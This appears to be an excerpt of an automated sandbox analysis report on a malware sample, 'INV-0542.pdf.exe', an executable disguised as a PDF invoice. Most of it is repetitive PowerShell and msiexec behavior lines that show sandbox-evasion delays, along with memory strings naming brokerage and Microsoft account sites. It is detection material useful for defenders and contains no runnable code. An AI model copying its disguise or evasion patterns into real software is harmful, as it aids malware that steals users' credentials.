          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599891Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599766Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599656Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599547Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599438Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599313Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599188Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599078Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598969Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598844Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598735Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598610Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598485Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598360Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598235Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598110Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597985Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597860Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597735Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597610Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597485Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597360Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597235Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597110Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596985Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596860Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596735Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596610Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596485Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596360Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596235Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596110Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595985Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595860Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595735Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595610Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595485Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595360Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595235Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595110Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594985Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594860Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594735Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594610Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594485Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594360Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594235Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594110Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593985Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8220Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1435Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1532Thread sleep time: -8301034833169293s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452Thread sleep count: 33 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452Thread sleep time: -30437127721620741s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452Thread sleep time: -600000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 2680Thread sleep count: 1426 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452Thread sleep time: -599891s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 2680Thread sleep count: 8384 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452Thread sleep count: 41 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452Thread sleep time: -599766s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452Thread sleep time: -599656s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452Thread sleep time: -599547s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452Thread sleep time: -599438s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452Thread sleep time: -599313s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452Thread sleep time: -599188s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452Thread sleep time: -599078s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452Thread sleep time: -598969s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452Thread sleep time: -598844s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452Thread sleep time: -598735s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452Thread sleep time: -598610s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452Thread sleep time: -598485s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452Thread sleep time: -598360s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452Thread sleep time: -598235s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452Thread sleep time: -598110s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452Thread sleep time: -597985s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452Thread sleep time: -597860s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452Thread sleep time: -597735s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452Thread sleep time: -597610s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452Thread sleep time: -597485s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452Thread sleep time: -597360s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452Thread sleep time: -597235s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452Thread sleep time: -597110s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452Thread sleep time: -596985s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452Thread sleep time: -596860s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452Thread sleep time: -596735s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452Thread sleep time: -596610s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452Thread sleep time: -596485s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452Thread sleep time: -596360s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452Thread sleep time: -596235s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452Thread sleep time: -596110s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452Thread sleep time: -595985s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452Thread sleep time: -595860s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452Thread sleep time: -595735s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452Thread sleep time: -595610s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452Thread sleep time: -595485s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452Thread sleep time: -595360s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452Thread sleep time: -595235s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452Thread sleep time: -595110s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452Thread sleep time: -594985s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452Thread sleep time: -594860s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452Thread sleep time: -594735s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452Thread sleep time: -594610s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452Thread sleep time: -594485s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452Thread sleep time: -594360s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452Thread sleep time: -594235s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452Thread sleep time: -594110s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452Thread sleep time: -593985s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\INV-0542.pdf.exeCode function: 0_2_00405C4D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C4D
          Source: C:\Users\user\Desktop\INV-0542.pdf.exeCode function: 0_2_00402930 FindFirstFileW,0_2_00402930
          Source: C:\Users\user\Desktop\INV-0542.pdf.exeCode function: 0_2_0040689E FindFirstFileW,FindClose,0_2_0040689E
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599891Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599766Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599656Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599547Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599438Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599313Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599188Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599078Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598969Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598844Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598735Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598610Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598485Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598360Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598235Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598110Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597985Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597860Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597735Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597610Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597485Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597360Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597235Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597110Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596985Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596860Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596735Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596610Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596485Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596360Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596235Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596110Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595985Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595860Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595735Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595610Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595485Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595360Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595235Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595110Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594985Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594860Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594735Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594610Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594485Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594360Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594235Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594110Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593985Jump to behavior
          Source: msiexec.exe, 00000005.00000002.3303268836.0000000022C40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
          Source: msiexec.exe, 00000005.00000002.3303268836.0000000022C40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
          Source: msiexec.exe, 00000005.00000002.3303268836.0000000022C40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
          Source: msiexec.exe, 00000005.00000002.3303268836.0000000022921000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
          Source: msiexec.exe, 00000005.00000002.3303268836.0000000022921000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
          Source: msiexec.exe, 00000005.00000002.3303268836.0000000022921000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
          Source: msiexec.exe, 00000005.00000002.3286405273.0000000000767000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3286405273.000000000070A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: msiexec.exe, 00000005.00000002.3303268836.0000000022921000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
          Source: powershell.exe, 00000002.00000002.2413511774.0000000004EF7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter@\jq
          Source: msiexec.exe, 00000005.00000002.3303268836.0000000022C40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
          Source: msiexec.exe, 00000005.00000002.3303268836.0000000022C40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
          Source: ModuleAnalysisCache.2.drBinary or memory string: Get-NetEventVmNetworkAdapter
          Source: msiexec.exe, 00000005.00000002.3303268836.0000000022921000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
